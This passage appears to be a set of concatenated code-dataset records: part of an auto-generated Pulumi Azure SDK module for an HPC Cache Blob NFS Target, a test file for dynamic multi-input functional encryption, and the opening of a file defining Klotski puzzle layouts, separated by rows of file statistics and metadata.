The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "cache_name")
@cache_name.setter
def cache_name(self, value: pulumi.Input[str]):
pulumi.set(self, "cache_name", value)
@property
@pulumi.getter(name="namespacePath")
def namespace_path(self) -> pulumi.Input[str]:
"""
The client-facing file path of the HPC Cache Blob NFS Target.
"""
return pulumi.get(self, "namespace_path")
@namespace_path.setter
def namespace_path(self, value: pulumi.Input[str]):
pulumi.set(self, "namespace_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@property
@pulumi.getter(name="usageModel")
def usage_model(self) -> pulumi.Input[str]:
"""
The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
return pulumi.get(self, "usage_model")
@usage_model.setter
def usage_model(self, value: pulumi.Input[str]):
pulumi.set(self, "usage_model", value)
@property
@pulumi.getter(name="accessPolicyName")
def access_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the access policy applied to this target. Defaults to `default`.
"""
return pulumi.get(self, "access_policy_name")
@access_policy_name.setter
def access_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_policy_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _CacheBlobNfsTargetState:
def __init__(__self__, *,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering CacheBlobNfsTarget resources.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
if access_policy_name is not None:
pulumi.set(__self__, "access_policy_name", access_policy_name)
if cache_name is not None:
pulumi.set(__self__, "cache_name", cache_name)
if name is not None:
pulumi.set(__self__, "name", name)
if namespace_path is not None:
pulumi.set(__self__, "namespace_path", namespace_path)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if storage_container_id is not None:
pulumi.set(__self__, "storage_container_id", storage_container_id)
if usage_model is not None:
pulumi.set(__self__, "usage_model", usage_model)
@property
@pulumi.getter(name="accessPolicyName")
def access_policy_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the access policy applied to this target. Defaults to `default`.
"""
return pulumi.get(self, "access_policy_name")
@access_policy_name.setter
def access_policy_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "access_policy_name", value)
@property
@pulumi.getter(name="cacheName")
def cache_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "cache_name")
@cache_name.setter
def cache_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_name", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="namespacePath")
def namespace_path(self) -> Optional[pulumi.Input[str]]:
"""
The client-facing file path of the HPC Cache Blob NFS Target.
"""
return pulumi.get(self, "namespace_path")
@namespace_path.setter
def namespace_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "namespace_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> Optional[pulumi.Input[str]]:
"""
The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_container_id", value)
@property
@pulumi.getter(name="usageModel")
def usage_model(self) -> Optional[pulumi.Input[str]]:
"""
The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
return pulumi.get(self, "usage_model")
@usage_model.setter
def usage_model(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "usage_model", value)
class CacheBlobNfsTarget(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
        Manages a Blob NFSv3 Target within an HPC Cache.
        > **NOTE:** By request of the service team, the provider no longer automatically registers the `Microsoft.StorageCache` Resource Provider for this resource. To register it you can run `az provider register --namespace 'Microsoft.StorageCache'`.
        > **NOTE:** This resource depends on an NFSv3-enabled Storage Account, which has some prerequisites that need to be met. Please check out: https://docs.microsoft.com/en-us/azure/storage/blobs/network-file-system-protocol-support-how-to?tabs=azure-powershell.
## Import
HPC Cache Blob NFS Targets can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:hpc/cacheBlobNfsTarget:CacheBlobNfsTarget example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StorageCache/caches/cache1/storageTargets/target1
```
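        ## Example Usage

        A minimal sketch of creating a target (the resource names, resource group, and storage container ID below are illustrative placeholders, not values required by the provider):

        ```python
        import pulumi_azure as azure

        example = azure.hpc.CacheBlobNfsTarget("example",
            resource_group_name="example-resources",
            cache_name="example-hpc-cache",
            storage_container_id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/example-resources/providers/Microsoft.Storage/storageAccounts/examplesa/blobServices/default/containers/examplecontainer",
            namespace_path="/blob_storage",
            usage_model="READ_HEAVY_INFREQ")
        ```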
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CacheBlobNfsTargetArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
        Manages a Blob NFSv3 Target within an HPC Cache.
        > **NOTE:** By request of the service team, the provider no longer automatically registers the `Microsoft.StorageCache` Resource Provider for this resource. To register it you can run `az provider register --namespace 'Microsoft.StorageCache'`.
        > **NOTE:** This resource depends on an NFSv3-enabled Storage Account, which has some prerequisites that need to be met. Please check out: https://docs.microsoft.com/en-us/azure/storage/blobs/network-file-system-protocol-support-how-to?tabs=azure-powershell.
## Import
HPC Cache Blob NFS Targets can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:hpc/cacheBlobNfsTarget:CacheBlobNfsTarget example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.StorageCache/caches/cache1/storageTargets/target1
```
:param str resource_name: The name of the resource.
:param CacheBlobNfsTargetArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CacheBlobNfsTargetArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CacheBlobNfsTargetArgs.__new__(CacheBlobNfsTargetArgs)
__props__.__dict__["access_policy_name"] = access_policy_name
if cache_name is None and not opts.urn:
raise TypeError("Missing required property 'cache_name'")
__props__.__dict__["cache_name"] = cache_name
__props__.__dict__["name"] = name
if namespace_path is None and not opts.urn:
raise TypeError("Missing required property 'namespace_path'")
__props__.__dict__["namespace_path"] = namespace_path
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if storage_container_id is None and not opts.urn:
raise TypeError("Missing required property 'storage_container_id'")
__props__.__dict__["storage_container_id"] = storage_container_id
if usage_model is None and not opts.urn:
raise TypeError("Missing required property 'usage_model'")
__props__.__dict__["usage_model"] = usage_model
super(CacheBlobNfsTarget, __self__).__init__(
'azure:hpc/cacheBlobNfsTarget:CacheBlobNfsTarget',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
access_policy_name: Optional[pulumi.Input[str]] = None,
cache_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
namespace_path: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_container_id: Optional[pulumi.Input[str]] = None,
usage_model: Optional[pulumi.Input[str]] = None) -> 'CacheBlobNfsTarget':
"""
Get an existing CacheBlobNfsTarget resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CacheBlobNfsTargetState.__new__(_CacheBlobNfsTargetState)
__props__.__dict__["access_policy_name"] = access_policy_name
__props__.__dict__["cache_name"] = cache_name
__props__.__dict__["name"] = name
__props__.__dict__["namespace_path"] = namespace_path
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["storage_container_id"] = storage_container_id
__props__.__dict__["usage_model"] = usage_model
return CacheBlobNfsTarget(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accessPolicyName")
def access_policy_name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the access policy applied to this target. Defaults to `default`.
"""
return pulumi.get(self, "access_policy_name")
@property
@pulumi.getter(name="cacheName")
def cache_name(self) -> pulumi.Output[str]:
"""
The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "cache_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="namespacePath")
def namespace_path(self) -> pulumi.Output[str]:
"""
The client-facing file path of the HPC Cache Blob NFS Target.
"""
return pulumi.get(self, "namespace_path")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Output[str]:
"""
The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@property
@pulumi.getter(name="usageModel")
def usage_model(self) -> pulumi.Output[str]:
"""
The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
"""
return pulumi.get(self, "usage_model")
| 53.832244 | 283 | 0.683799 | 3,246 | 24,709 | 4.986137 | 0.071781 | 0.064566 | 0.080445 | 0.060241 | 0.891566 | 0.876058 | 0.85882 | 0.840964 | 0.82768 | 0.805993 | 0 | 0.007223 | 0.226759 | 24,709 | 458 | 284 | 53.949782 | 0.839893 | 0.425068 | 0 | 0.664151 | 1 | 0 | 0.120415 | 0.008487 | 0 | 0 | 0 | 0 | 0 | 1 | 0.158491 | false | 0.003774 | 0.018868 | 0 | 0.271698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
39fb63ce9cb545bdfba644f410339ac244125cf5 | 7,263 | py | Python | test/crypto/test_mife_dynamic.py | eggry/nn-emd | 5488e3b0de904415e27c9e9e9af3e1e3c8923025 | [
"MIT"
] | null | null | null | test/crypto/test_mife_dynamic.py | eggry/nn-emd | 5488e3b0de904415e27c9e9e9af3e1e3c8923025 | [
"MIT"
] | null | null | null | test/crypto/test_mife_dynamic.py | eggry/nn-emd | 5488e3b0de904415e27c9e9e9af3e1e3c8923025 | [
"MIT"
] | null | null | null | import random
import logging
import numpy as np
from nn.utils import timer
from crypto.mife_dynamic import MIFEDynamic
from crypto.mife_dynamic import MIFEDynamicTPA
from crypto.mife_dynamic import MIFEDynamicClient
from crypto.utils import load_dlog_table_config
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
sec_param_config_file = 'config/sec_param.json'
dlog_table_config_file = 'config/dlog_b8.json'
def test_mife_basic():
logger.info("testing the correctness of basic mife.")
parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(parties[idx])]
x_vec_count = x_vec_count + parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
mife = MIFEDynamic(sec_param=256, parties=parties)
mife.setup()
ct = dict()
ct['parties'] = parties
ct['ct_dict'] = dict()
for idx in parties.keys():
pk = mife.generate_public_key(idx)
ct['ct_dict'][idx] = mife.encrypt(pk, x_dict[idx])
common_pk = mife.generate_common_public_key()
sk = mife.generate_private_key(y_vec, parties)
max_inner_prod = 1000000
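    # upper bound for the discrete-log recovery of <x,y>; with 9 entries each
    # bounded by 100, <x,y> <= 9 * 100 * 100 = 90000, well below 1000000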
with timer('total decryption time:', logger) as t:
dec_prod = mife.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod)
def test_mife_basic_with_config():
logger.info("testing the correctness of mife using config file.")
parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(parties[idx])]
x_vec_count = x_vec_count + parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
logger.info('loading dlog configuration ...')
with timer('load dlog config, cost time:', logger) as t:
dlog = load_dlog_table_config(dlog_table_config_file)
logger.info('load dlog configuration DONE')
mife = MIFEDynamic(sec_param=256, parties=parties,
sec_param_config=sec_param_config_file, dlog=dlog)
mife.setup()
ct = dict()
ct['parties'] = parties
ct['ct_dict'] = dict()
for idx in parties.keys():
pk = mife.generate_public_key(idx)
ct['ct_dict'][idx] = mife.encrypt(pk, x_dict[idx])
common_pk = mife.generate_common_public_key()
sk = mife.generate_private_key(y_vec, parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod)
def test_mife_dynamic():
logger.info('test dynamic mife ...')
setup_parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4,
'idx-4': 4,
'idx-5': 1,
'idx-6': 2
}
logger.info('loading dlog configuration ...')
with timer('load dlog config, cost time:', logger) as t:
dlog = load_dlog_table_config(dlog_table_config_file)
logger.info('load dlog configuration DONE')
mife = MIFEDynamic(sec_param=256, parties=setup_parties,
sec_param_config=sec_param_config_file, dlog=dlog)
mife.setup()
enrolled_parties = {
'idx-2': 3,
'idx-3': 4,
'idx-5': 1
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in enrolled_parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(enrolled_parties[idx])]
x_vec_count = x_vec_count + enrolled_parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
ct = dict()
ct['parties'] = enrolled_parties
ct['ct_dict'] = dict()
for idx in enrolled_parties.keys():
pk = mife.generate_public_key(idx)
ct['ct_dict'][idx] = mife.encrypt(pk, x_dict[idx])
common_pk = mife.generate_common_public_key()
sk = mife.generate_private_key(y_vec, enrolled_parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod)
def test_mife_dynamic_separate():
logger.info('test dynamic mife in separate roles ...')
setup_parties = {
'idx-1': 2,
'idx-2': 3,
'idx-3': 4,
'idx-4': 4,
'idx-5': 1,
'idx-6': 2
}
logger.info('loading dlog configuration ...')
with timer('load dlog config, cost time:', logger) as t:
dlog = load_dlog_table_config(dlog_table_config_file)
logger.info('load dlog configuration DONE')
mife_tpa = MIFEDynamicTPA(sec_param=256, parties=setup_parties, sec_param_config=sec_param_config_file)
mife_tpa.setup()
mife_enc_client = MIFEDynamicClient(sec_param=256, role='enc')
mife_dec_client = MIFEDynamicClient(sec_param=256, role='dec', dlog=dlog)
enrolled_parties = {
'idx-2': 3,
'idx-3': 4,
'idx-5': 1
}
# prepare the test data
max_test_value = 100
x_dict = dict()
x_vec_count = 0
x_vec = []
for idx in enrolled_parties.keys():
x_dict[idx] = [random.randint(0, max_test_value) for m in range(enrolled_parties[idx])]
x_vec_count = x_vec_count + enrolled_parties[idx]
x_vec = x_vec + x_dict[idx]
y_vec = [random.randint(0, max_test_value) for i in range(x_vec_count)]
logger.debug("x: %s" % str(x_vec))
logger.debug("y: %s" % str(y_vec))
logger.debug('original dot product <x,y>: %d' % int(sum(np.array(x_vec) * np.array(y_vec))))
ct = dict()
ct['parties'] = enrolled_parties
ct['ct_dict'] = dict()
for idx in enrolled_parties.keys():
pk = mife_tpa.generate_public_key(idx)
ct['ct_dict'][idx] = mife_enc_client.encrypt(pk, x_dict[idx])
common_pk = mife_tpa.generate_common_public_key()
sk = mife_tpa.generate_private_key(y_vec, enrolled_parties)
max_inner_prod = 1000000
with timer('total decryption time:', logger) as t:
dec_prod = mife_dec_client.decrypt(common_pk, sk, y_vec, ct, max_inner_prod)
logger.debug('decrypted dot product <x,y>: %d' % dec_prod) | 34.751196 | 107 | 0.642159 | 1,106 | 7,263 | 3.964738 | 0.097649 | 0.032839 | 0.032839 | 0.031015 | 0.899202 | 0.869327 | 0.830331 | 0.821209 | 0.814595 | 0.806613 | 0 | 0.021159 | 0.225664 | 7,263 | 209 | 108 | 34.751196 | 0.758535 | 0.011979 | 0 | 0.778409 | 0 | 0 | 0.143335 | 0.002928 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022727 | false | 0 | 0.045455 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2626ee40586b5e126d259ac555dd4e14457771e3 | 7,516 | py | Python | games.py | Hankl227/Klotski | 1e6f65e7b82c77d58a97a4a08dc475e199f9841e | [
"Apache-2.0"
] | null | null | null | games.py | Hankl227/Klotski | 1e6f65e7b82c77d58a97a4a08dc475e199f9841e | [
"Apache-2.0"
] | 7 | 2020-09-14T20:33:28.000Z | 2020-10-23T23:43:18.000Z | games.py | Hankl227/Klotski | 1e6f65e7b82c77d58a97a4a08dc475e199f9841e | [
"Apache-2.0"
] | 1 | 2020-11-24T03:12:23.000Z | 2020-11-24T03:12:23.000Z | # Author: Shway Wang
# Date: 2020, September 15th
# Location: China Ningxia Yinchuan
from util import *
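# Each function below builds one classic Huarong Dao (Klotski) opening layout.
# The encoding is assumed from util.py: positions are [column, row] on the
# standard 4-wide, 5-tall board; CaoCao is the 2x2 block, each Jiang a 1x2
# block oriented VER (vertical) or HOR (horizontal), and each Bing a 1x1 block.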
# 逃之夭夭 (Fleeing Without a Trace):
def TZYY():
# caoCao:
caoCao = CaoCao([1, 2])
# Jiangs:
zhaoYun = Jiang([3, 0], VER, 'y')
guanYu = Jiang([1, 0], HOR, 'g')
maChao = Jiang([0, 2], VER, 'm')
huangZhong = Jiang([3, 2], VER, 'h')
zhangFei = Jiang([0, 0], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([1, 1])
b2 = Bing([2, 1])
b3 = Bing([0, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 无横之局 (No Horizontal Blocks):
def WHZJ():
# caoCao:
caoCao = CaoCao([0, 2])
# Jiangs:
zhaoYun = Jiang([2, 1], VER, 'y')
guanYu = Jiang([2, 3], VER, 'g')
maChao = Jiang([1, 0], VER, 'm')
huangZhong = Jiang([0, 0], VER, 'h')
zhangFei = Jiang([3, 1], VER, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([2, 0])
b2 = Bing([3, 0])
b3 = Bing([0, 4])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 将当后路 (A General Blocks the Retreat):
def JDHL():
# caoCao:
caoCao = CaoCao([2, 0])
# Jiangs:
zhaoYun = Jiang([0, 2], HOR, 'y')
guanYu = Jiang([0, 0], HOR, 'g')
maChao = Jiang([0, 3], HOR, 'm')
huangZhong = Jiang([2, 2], HOR, 'h')
zhangFei = Jiang([0, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 4])
b2 = Bing([1, 4])
b3 = Bing([2, 3])
b4 = Bing([3, 3])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 前呼后拥 (Escorted Front and Rear):
def QHHY():
# caoCao:
caoCao = CaoCao([2, 0])
# Jiangs:
zhaoYun = Jiang([2, 2], HOR, 'y')
guanYu = Jiang([0, 1], HOR, 'g')
maChao = Jiang([0, 3], HOR, 'm')
huangZhong = Jiang([2, 3], HOR, 'h')
zhangFei = Jiang([0, 2], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 0])
b2 = Bing([1, 0])
b3 = Bing([2, 4])
b4 = Bing([3, 4])
bingList = [b1, b2, b3, b4]
return Zhen(caoCao, jiangList, bingList)
# 比翼横空 (Wing to Wing Across the Sky):
def BYHK():
# caoCao:
caoCao = CaoCao([2, 0])
# Jiangs:
zhaoYun = Jiang([0, 2], HOR, 'y')
guanYu = Jiang([0, 0], HOR, 'g')
maChao = Jiang([2, 2], HOR, 'm')
huangZhong = Jiang([3, 3], VER, 'h')
zhangFei = Jiang([0, 1], HOR, 'z')
jiangList = [zhaoYun, guanYu, maChao, huangZhong, zhangFei]
# Bings:
b1 = Bing([0, 3])
b2 = Bing([0, 4])
b3 = Bing([2, 3])
b4 = Bing([2, 4])
